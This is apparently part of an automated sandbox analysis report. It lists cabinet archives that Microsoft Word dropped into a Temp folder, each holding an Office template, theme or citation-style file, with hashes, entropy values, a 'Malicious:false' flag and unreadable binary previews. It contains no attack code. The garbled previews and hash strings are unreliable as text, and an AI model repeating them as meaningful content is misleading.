                                                                                    Preview:MSCF....1A......L...........................1A...?..................S@......v...............iso690.xsl.................Content.inf.B.9.....[...A.c...32.E...P..'.^}.f...ikMJ....m..s..U.w{m{{...}n.4........I. ..9..d..I.......P|....F...F.......&&J.:I.34......+*M3..4mr.........m.r..m)....dK.wiw...H,...r........y.$..Cu...L...dH.../..V......g.PG$R39...4O..............{w..^....c.m.m.o.....#..Fgs..6.....b....3.I..O....B..B..1h"....K|f .41......_..g.N.<.>........(....o3a.M)....J..}....-......8.......g.hm!r<...-..1.1....q.?....S.m...`L.g#.K.igv.].ghD....L...p5..?.......iP.[JS.J..?z~.T/.Q...E.K.......P+\LW.-.c..[9.n.7.....P...*[.A1....m...4h.9...N[....h5 n%k.~RR.*c..n..=...4....).eH.-./..>....*.r..S.*..dE.........pF..s.A..?...f..u.+.{..?>N.4].}Xb.M......y......'.2..'..........J4{r..r.3........5>..a0.>.u_.y@g....+y.yu--,ZdD.........5]3..'.s...|.....K.....T..G.G.e...)..\x..OM.g...`..j0......BfH...+.....:......l`.qU...;.@...",.."........>;P.B.^F...3!......Rx.9..

                                                                                    C:\Users\user\AppData\Local\Temp\cabE3FC.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):31562
                                                                                    Entropy (8bit):7.81640835713744
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                                                                                    MD5:1D6F8E73A0662A48D332090A4C8C898F
                                                                                    SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                                                                    SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                                                                    SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                                                                    Malicious:false
                                                                                    Preview:MSCF....:<......L...........................:<...?..................D;.......V..............harvardanglia2008officeonline.xsl.L...............Content.inf.Vu......[...E..o..3D.5..nF.A..+.e.....6r..f........M3...-.s.m.... $r.b.!.q!.....G...0.\.......fd......%m...'1Y..f..O...*.#.P.,{..m...|..ww.{.m...f...n%...,..y...0y...8.Q...`.../.q....a...',.V......8.7..8t..................6.]..6..nw..ynm..-l.Y..,.I?..$....+b9$E!S@"..) .4........H...lA...@!a.F.l$..0#!.....n&.5j.t+..1f|.+....E.zDk.l8.+<q.^.........\5.l..iT.9...........Y..6.^,.o.bn.E*5w..s.../...W.gS..j9..'W.F......].4\Mzz..Td..Ho..~.Q...Z..D..O.JP..m..s.j.:..........y._.....#.*.rD....60.\!y........p.o3,..Ub,......[[L.{.5.....5.7UDB9.{;;g.z.z..jM.G.MY.oe.....(r..B6..CV.7Fl.Z/....-.O.vY.c...-..........b.T)3.u..f~x2.?.8.g.x.-.....Qt_...$e.l..jtP..b....h..*.sW0.`.....c...F_....t.........LC..*5I.X$^.;&....#.._\J..........;..wP..wX.qy.qs...}46..fK.XN.&0........k1....8...............'t.......}.......O_.

                                                                                    C:\Users\user\AppData\Local\Temp\cabE3FD.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):21875
                                                                                    Entropy (8bit):7.6559132103953305
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                                                                    MD5:E532038762503FFA1371DF03FA2E222D
                                                                                    SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                                                                    SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                                                                    SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                                                                    Malicious:false
                                                                                    Preview:MSCF....c.......D...........................c....?..................................ThemePictureAlternatingAccent.glox.................Content.inf...3.....[.... .qq...........\<.^......o."......f.o...x.{..q..^.MH^...........{0.K....4pX.i...@6A4X.P.01d....'p.......zA.......... .......7.......a. `.=!@- ......>G.s.k~@.a.lfha:m....1...@.,G`....{....W..N..qs.......j.+TrsT.l.9..L...1+...d..-u..-.......).#u&...3......k.&C...DdZ.'.......8..<PF..r.eq.X6...u..v...s5.m.Q.l.G%.<.]....RV<...S..Dv..s.r.......dh.N.3-.Hf'.....3.GZ..E.kt.5......h...|...?!.L....~.)..v....:2.../F.,....o.qi.i7..E.|.mh.R_.@A.FO@i.....Feo...x.l...{E.\W9|V...=#..3..(......tP.:i....Ox.U.N...%6...p.6&.....<zh.z.|.<Z.?.k....y7m...F.Z$-.:.l.h...{T..7....?..T...d,r...z?../...`/Z......a.v@)....u......V..v.:.._.|.'..[..O.s.OAt-."b.In"..I...J*.~H.:-...?..uV....dZ;z:.l.{.E.,.Q..i]:.0r.I.y..f...../j.wN...^R.....u....>..}....f.f...]A..C~;/....%..^#..N.a..........99.....`.....%..iS....S......$....)

                                                                                    C:\Users\user\AppData\Local\Temp\cabE40E.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):31008
                                                                                    Entropy (8bit):7.806058951525675
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                                                                                    MD5:E033CCBC7BA787A2F824CE0952E57D44
                                                                                    SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                                                                    SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                                                                    SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                                                                    Malicious:false
                                                                                    Preview:MSCF.....:......L............................:...?...................9......................mlaseventheditionofficeonline.xsl.L...............Content.inf.N.#.....[...>..9..3c.5...F.B.]Y.3..%d.8...v;....~Y.L.=..v..m.g...|K.B....$......s.......#CdE.p.p..@...j.Nl2'...L..N.G:-V:.d.....i..M........mK.w.....\W.<.`..b$.!..!3..rT.A..#.).;KZ...a.-..j&e`R.~7dIRS.I..f.ff....}.}....^[wo.uw..i.m7......v$.I..n....-.Z.M5...iH..Ea..., [..0.L...DH..." ..... .@...H.@..+...}.......*^..'.4*.tHa..f].gV..~.7V.....C..).(.U"..f.@l..j'..%\.u.UU.....9<13...5..=........./..Z..{..-.L].+Y.fL.<EJ.q..!.j....W..]E./.~Y>...GgQ..-....Q.C..5..T+...fO. .)..~.7..Y....+..U=.e..8w.m...._..S..v.d.* ......S3z.X)......u...t.......i.;.a...X.Ji....g.3.!.O.....T.f6..[U....O..Z.X.q.G....?.k]..?...8.u.;].8y.T.9D..!?R....:........3+.P.....7?m}..............1...y3.g.\c.ks^;?.f.U5...U.j....E.N.}.!.......).R1....~.....R.....3.J.f...l..E^:...&_..%..v...^..E...rC..O....M.#..<..H..bB.+.W..

                                                                                    C:\Users\user\AppData\Local\Temp\cabE40F.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):30957
                                                                                    Entropy (8bit):7.808231503692675
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                                                                                    MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                                                                                    SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                                                                                    SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                                                                    SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                                                                    Malicious:false
                                                                                    Preview:MSCF.....9......L............................9...?...................8......1P..............iso690nmerical.xsl.................Content.inf...A@...[...5.....33.E...P.../..........5sv.]3srm8.T.=.......}.v.T.. ..4IH.r.%Z.(.q.\+K..[,....E....A......#CEF..}p..Y/s$...YKI.#M.?.t.1#C....I..v.vn...-...v7../S.m.Ma.....!.Y....4.......3.3....c&R9..%......(J..BDMI.>7J.....".....}.w.}w.wg.v...^.n.{....{f.mlI..%.#..I..S....D..QJ U......4........K.(@....DH.....}...8;..z...&0%e..G.OAM..x.3......\....zS9....}......89.B...e.W.p{;.....m.m3...}....../...q.~..;.,..".j.g..^N............iC.../|...g.=..9.Q].Gf.....QA....74..v.....9.n[......0.}..jo{y./.2..Ym......;u...b.(Jz^.....~..uM...{s../..#.)n2..S.S.c..6)U.V....!.'R.......P.S.D..S.p/......D.......{......?.u.",...Mp._....N..+..=Y#..&0w....r.......$.xwC......P.e7.>O....7....].y%q^S'....*.C.`.?..}Q..k../u.TK...y........S...{T.?......[.H.'L..AS.Y.|*..b...J.H-.^U>'9..uD[.".b[.l.......o..6.L).h.B0RJa.b..|m:.):......F

                                                                                    C:\Users\user\AppData\Local\Temp\cabE410.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):22594
                                                                                    Entropy (8bit):7.674816892242868
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                                                                    MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                                                                    SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                                                                    SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                                                                    SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                                                                    Malicious:false
                                                                                    Preview:MSCF....2.......D...........................2....?..................0...............ThemePictureAccent.glox.....0...........Content.inf.o.@D..8.[.........B.....?. $...K.....~....aZ.WA"...k.......Z......."......"..X.fpB 2@d..87.[.A......p..e.'......F..P^%.%.RK...........T%0..........9..+8 ...&.q.....+.......^.fad^^n...d.....s1..... .3j.c-c7..y<.....6........C5n.KG...Rs[lt..ZkwI.!..Uj.ez_!A^: /.;.Rl4....^..<6..N...'.YY.n*.E{.`..s.7..z.......L.y.Y.....q.kx.....[5.+<to......1...L.r.m..kC.q.k.1..o.w8s.....xh.@.b.`l\...}z1.6..Y.</DY...Z5..D...0..4.;..XAA..0qD..E.....h...C..hH......S..Z.\.VBu......Rxs.+:RKzD......{......a..=......).<.....d.SM.......c!t.4.h..A=J~.>q?Hw.^.....?.....[..`....v.nl..A.u...S!...............c......b.J.I.....D...._?}..or.g.JZ#*."_``.>.....{...w......s...R.iXR..'z....S.z.\..f.....>7m..0q.c-8\..nZw.q..J.l....+..V....ZTs{.[yh..~..c........9;..D...V.s...#...JX~t8%......cP^...!.t......?..'.(.kT.T.y.I ...:..Y3..[Up.m...%.~

                                                                                    C:\Users\user\AppData\Local\Temp\cabE451.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):31605
                                                                                    Entropy (8bit):7.820497014278096
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                                                                                    MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                                                                    SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                                                                    SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                                                                    SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                                                                    Malicious:false
                                                                                    Preview:MSCF....e<......L...........................e<...?...................;......................gostname.xsl."...............Content.inf.[.......[...>..|..32.E..o`h....W.>.^...v..5...m.w.$.U..U......m.mu...'4....m`.9F.. ...I..PTS..O.D...GM#...#CUE.`.`%n..N...G,.~..+.6cv.L...G.m.Y..vy.....Yh9/.m,..wtw..;....Ka.a.{.\...'.....<X....%)...G..d......R./..4$..32..@....f.h....w..ov.}w..[.....{.v.......dr..&w#G..$3.zI&f..(C..L.z5J... .`...!.!4. ...!.` .$........w.J.X7.w_..@.w..f]=.C.....I-....s.s_.x...~..A... ...z...nM..;....Z....vt....6...~.w.....*x.g.h.T.J..-.3=....G.n..ti.A...s...j$.Bf..?......6.t.<j...>.."....&=BO?w.uN.o.t.-r..K....>C..^G..p...k...>.xZ.[fL..n.."].W#...|.i.0W.q.F: ..<#w......w....s....."...n.qu.../rI.....q....P~.B..|b?.N.}..MyO..q..:q.7..-~.xa.S...|.....X.....g.W.3.mo..yy.GG.s>....qy....r........#.F.P..A.......A....b.2..14.8.i6..w.S...v~{0z.<.Z...^!.;2mSV.i....{...U...+...r.;...h.++..T6.a...$....j5F+..1t....b......|.Q\d-.S..2... ......Y..A...s....

                                                                                    C:\Users\user\AppData\Local\Temp\cabE452.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):43653
                                                                                    Entropy (8bit):7.899157106666598
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                                                                                    MD5:DA3380458170E60CBEA72602FDD0D955
                                                                                    SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                                                                    SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                                                                    SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                                                                    Malicious:false
                                                                                    Preview:MSCF....uk......L...........................uk...?...................j......r...............Equations.dotx.................Content.inf.94v..R..[..... .............v........." Vw.w..r.....D.V5.p...W......b;....\x.....f.-...............l.....L.F..*..@..BnF.I.....%1..0....&.X.......X-.\.\.>..A....@..:...N .G./.Sp.A0.0.`.....q....b... ......S.{K...V....J............>\....\.E.#.,$.hxu.F.Fo....<...{..6../..#..l>d...w...&...S.....L.].....^..L......;~l.......qw.o. .....v.u.W`.4Z.A.....dC..Q)9.c..qgtfJ..G.(.J....q4V.).mK4;..zY..b.5&....V...0X.].Z..U.Lx..^..:8XQh.....7yy.._5............c.W...c...xY..%..G.$....kg^.1g.9.....z^.'...q."..K)a[.pW .LS.:Q8.....2..._q.os....y...d11.*.m....8.,.^.4_?i.e.u.,....._y.....zZZA.D.D<..+....{....Sfnv...t.....0...vV..y.r..3..%.<.t......;.h.wh.-.g.>..5...R...........y..]^..R..<...>$~.'...kk.n..H.EN.eQ.Q.O./='....)t.l0,/].....FNN......?...&..'.eS....K.K.v".^L..x=.^......1x|....=}@...B.kq;_a..C.q?..Y9.v......Q..u.G..V.

                                                                                    C:\Users\user\AppData\Local\Temp\cabE463.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):42788
                                                                                    Entropy (8bit):7.89307894056
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                                                                                    MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                                                                                    SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                                                                                    SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                                                                    SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                                                                    Malicious:false
                                                                                    Preview:MSCF.....h......L............................h...?..................@g......o...............Element design set.dotx.................Content.inf.Y/..Re..[......f........,..]....D.],....]..X.......XC4pE.....p........2..u;L.N.....]G..d.^d.$).e.=..;..Kb.../.../....H.."...w$._I..5.....a..4.Gd5p......v.8..1..%H..\..e...3.e..A..).d*.. . (.8.".......(>..<...@...~*v&.f..LWhqk]+Uep.d..%...o.....k.......e...nNN.&_.>.d.?H`"...r?..Z.p..q..<M.N.t....{*.y]#...._XW"qI...x.......}.. .N...;.}:..m8...[.r.F....^?...o...u..*...J3.V....~...~tn#.Kf6.s.|*..,s...M.$.f..?Yu.pE.1_wU...%....._..'..Z......y:.{.J5..7..Q.w}/.~.-3~Ctw=..IT.....mI.u@...y.M....2.%...y...Y..j.k<-.Q.r...7m..b...+.6..|.....U..}[...,....^....5..D..qW...[3).p.Y<.Hh..t...%cw=Z..W.~W.F....zr.4.g...O...P.g_^..3.-............3s...S..y...u...N...EsJz....tT../..c[w{cG....../6.....:.W<d5}.q..s..K"$........Ne..5..#.v'..n4.rj....Fc=....5..VN.....6..9`....|..........WX..-?..........W.)^`1.......].R2..s6...H.......

                                                                                    C:\Users\user\AppData\Local\Temp\cabE464.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):20554
                                                                                    Entropy (8bit):7.612044504501488
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                                                                    MD5:486CBCB223B873132FFAF4B8AD0AD044
                                                                                    SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                                                                    SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                                                                    SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                                                                    Malicious:false
                                                                                    Preview:MSCF....:.......D...........................:....?..................................PictureFrame.glox.................Content.inf........[.... '.q..@.........<./..+./. ...."o.o./..{^a.7^.D.HA....^J... ...........T%q..b...+pz.n.=....jT.+M..=H..A...py.3.........H...N...[..%..~....>.%....3.r...wx.....0.....7..94..2..45..7f.......D.. ...[...f.:H..../N..4.....8.....:x.I....u|.`."...\..N..%.M#..^v$.*....T.m.....?.-.wki.X..8..F.G..Y.^8...-....+.&.+&.No...e!.#.8.....YF.......<w.....=.Q.S..7....MW....M..9A.3..c..L....|.E-Y....]n".|....b9..l@.d.T...a.f...~.&k.[..yS..q..]L}..)w.....$.@..v...[9..X....V...a.NK....m9.5.....Kq.;9`.U.e...8.<..)Y.H........z.G...3n.yWa.g.>.w!e.B8:......f..h..z....o.1<.RT..WK...?g .N..+..p.B.|...1pR_......@...a....aA......ye..8...+M.l..(.d..f.;....g........8R.\.w.:ba....%...|p....`lrA.|....a.U.m=ld......7....#..?Dq..D.....(.5.K.a..c.G..7..]hF..%:}......}J.j$.....4...l];..v>.&j........Y.vk..$1.@X$...k...9..?...z..![..../...).a.=....aZ^.3?....

                                                                                    C:\Users\user\AppData\Local\Temp\cabE465.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):22340
                                                                                    Entropy (8bit):7.668619892503165
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                                                                    MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                                                                    SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                                                                    SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                                                                    SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                                                                    Malicious:false
                                                                                    Preview:MSCF....4.......D...........................4....?..................1...............ThemePictureGrid.glox.....1...........Content.inf....K..5.[.... V.q......B.....?.h.i.J.D...Z...>.....i~...A...Z....H.hy.D..X.....>...L.I..`. z w0}.K`.C{h....W\../.U..p\%...B...;............9..8.^M.....].lP.p...|..?..M....E..S.`..-n........Q'.'.o..C}=..?`.bQ...J"0f.. ....k3n..F.Pu..#...w].`<...."D.].-.#+):..fe..=<.M...4..s.q.f._.=.*T.M..U.[R.kbw.,......t6_I...~.X..$_.q....}2..BR...).[...<.l.3........h%....2.$`>..hG...0.6.S......._3.d~1.c.2g....7tTO..F.D.f.Y..WCG.B..T....Gg&.U'....u.S/......&6w..[bc.4....R.e..f.,....l."........I....J.=~...$x.&2...+,-.;.v.'.AQ.fc...v._..rZ..TYR...g?..Z..!.3mP dj...../...+...q.....>..../...]P.z?DW&.p..GZ....R5n......,..]{].0m.9...o.{...e."...8VH....w"%;.g\.K..p.}....#r.u..l.vS...Y.7U.N*-E@.....~....E...x.....C.......{NP....5Ymk.*._.K...Z...f..;.......b.....,._@B..\.S..d.'\rs..].}.5"XJU.J..'.zk}.+P.)C.X.?9sx.D....(K....P^N_D...Z.........

                                                                                    C:\Users\user\AppData\Local\Temp\cabE466.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):46413
                                                                                    Entropy (8bit):7.9071408623961394
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                                                                                    MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                                                                    SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                                                                    SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                                                                    SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                                                                    Malicious:false
                                                                                    Preview:MSCF....=v......L...........................=v...?..................5u......................Text Sidebar (Annual Report Red and Black design).docx.v...............Content.inf..C,.zd..[............... .w.....b...wwww]r..W\ww...... .hh...........o.nz.....Ku.7..-.oH...h;.N..#.._.D,}......!Q$..Un.tI11..$w.r3... ..p...=.1....""..n...*/....h.A...Y..c,.Q.,......",..b.1.w..$.....l../;..J.....~.. ....+.R#....7.-..1.x.feH.@.......u...(.DQ%.wL.N|.xh...R..#....C...'X.m.....I{W.....5.C.....\....z.Y.)w..i...%....M..n.p.....{..-G9..k.bT.6........7....).....6..ys.....R.e.....0.Xk`.3..X\xL..4J"#.f...:....r..2..Y.uW..052.n.+ ..o..o..f&u.v.&9y.P..6.K..in.DU.#.~....4i..6;.5.w..i...g.(....../..0*Vh...C..//....W..:w......7.6....]....4.*9...sL.0k...zHh..2N.H...*..]..(.x.:..........Y.+...-.....&.*^..Q.sW...v..w.....k.L.e.^.W4iFS..u.....l.g'...b~:Zm...S.2.|......5S..=.............l.../|....G|.9 ..#.q...W.Q...G=.."W..'.6....I....D._.{.g.47....V.1._..<?....m............)..T.

                                                                                    C:\Users\user\AppData\Local\Temp\cabE467.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):31083
                                                                                    Entropy (8bit):7.814202819173796
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                                                                    MD5:89A9818E6658D73A73B642522FF8701F
                                                                                    SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                                                                    SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                                                                    SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                                                                    Malicious:false
                                                                                    Preview:MSCF....[:......D...........................[:...?...................A..............CircleProcess.glox......A..........Content.inf......9.B[.....@*........!...(A.D..K.W.wwpwJj\.K\w...]...K.!.....@0..?,...}won`... ....&I..(;.....X.u..^.R..^......_:....W>f\....T...B..i`|q.....................i.5....(........0q7@.@..F...?A.`.....,L.......5.+../56..a`....1C5..9.*I.N.......@|<+./......... .ya....>l.,t.......y.y5...FF.,F..jCA...SA..H....8u.L..eM?.w8.......~^.Mr.[...(.._......u..+.......j..TJ.:<.3.X`...U.bz...[...r-...[...+..B.......}...\'.i...C.8.B_...c.8</..s.....VQ.Y..m.,.j~;y ...2.5.VQ...K..jP..2..r-...HA...."..9).7.....5.E._.wq.......!.+n+.f...s].4M'.1&...5....4..k..NV.M1.7`a..<.P4.|.mrd.i.R...u...............v.}..n\.C$.....[..2c.^..W..g..._.0.C.o....%.z.!.;.@y.`\..UO#i.)...Q...........L. .\:_..H.{.W...@...T.4..A.a...Wo?o$4.....#.V.s8M.Gh..p?A...Y.....)...........r|...!..o9...8..%#.[....;...3<Z...g....~.Z....,.(...qA.'x#..xC..@...HOuW.[.[....c.........

                                                                                    C:\Users\user\AppData\Local\Temp\cabE479.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
